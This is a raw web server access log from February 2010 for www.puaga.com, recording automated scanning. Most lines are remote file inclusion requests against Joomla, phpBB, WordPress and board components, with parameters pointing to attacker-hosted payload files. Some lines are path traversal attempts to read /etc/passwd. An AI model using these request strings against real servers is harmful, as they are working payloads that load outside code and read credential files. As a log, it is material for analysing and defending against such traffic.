195.184.217.50 - - [08/Feb/2010:08:32:02 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:32:43 -0800] "GET /logs/index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:32:43 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:32:44 -0800] "GET /index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:32:54 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:33:10 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:33:20 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:33:27 -0800] "GET /logs/access_100109.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:33:40 -0800] "GET /logs/access_100109.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:08:33:48 -0800] "GET /logs/access_100118.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:34:22 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:27 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:27 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:27 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:35 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:35 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:35 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:34:37 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:34:38 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:34:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:38 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:34:54 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:34:55 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:34:56 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:08:34:57 -0800] "GET /logs/access.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [08/Feb/2010:08:35:48 -0800] "GET /logs/access_100130.log/////delete_comment.php?board_skin_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:35:52 -0800] "GET /logs/access_100201.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:08:36:05 -0800] "GET /logs/access_100112.log//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:36:46 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:36:51 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:36:51 -0800] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:36:51 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:37:01 -0800] "GET /logs/access_100108.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:37:18 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:37:18 -0800] "GET /logs/access_100121.log//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:37:18 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:08:37:50 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:38:47 -0800] "GET /logs/access_100123.log/index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:38:47 -0800] "GET /logs/index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:38:48 -0800] "GET /index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:38:50 -0800] "GET /logs/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:38:50 -0800] "GET /index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:38:50 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:38:51 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:08:38:52 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS.php=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:08:38:53 -0800] "GET /logs/access_100119.log/index.php?redir=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:08:40:52 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:08:40:52 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:08:40:53 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:41:01 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:41:10 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [08/Feb/2010:08:41:24 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:42:12 -0800] "GET /logs/access_100201.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:42:13 -0800] "GET /includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:42:13 -0800] "GET /logs//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:08:42:40 -0800] "GET /logs/access_100105.log%20%20//modules/My_eGallery/public/displayCategory.php?adminpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:08:42:55 -0800] "GET /logs/access_100110.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:44:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:44:15 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:44:15 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:44:27 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [08/Feb/2010:08:44:29 -0800] "GET /logs/access_100119.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:44:51 -0800] "GET /logs/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:44:51 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:44:52 -0800] "GET /index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:44:53 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:44:53 -0800] "GET /logs/access_100129.log//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:44:53 -0800] "GET /logs/access_100202.log//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:08:44:54 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:08:44:54 -0800] "GET /write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:09 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:09 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:09 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:21 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:31 -0800] "GET /modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:32 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:32 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:33 -0800] "GET /modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:34 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:34 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:34 -0800] "GET /modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:34 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:34 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:35 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:45:35 -0800] "GET /logs/access_100112.log%20%20//includes/mx_functions_ch.php?phpbb_root_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:35 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:35 -0800] "GET /modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:37 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:37 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:37 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:38 -0800] "GET /modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:38 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:08:45:41 -0800] "GET /logs/access_100109.log//?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:08:45:42 -0800] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.822" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:08:45:42 -0800] "GET /logs//?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4947 "-" "libwww-perl/5.822" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:45:57 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:46:33 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:46:43 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:46:44 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:46:45 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:46:50 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:47:01 -0800] "GET /delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:47:01 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:08:47:02 -0800] "GET /logs/access_100202.log%20%20//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:20 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:20 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:08:47:20 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
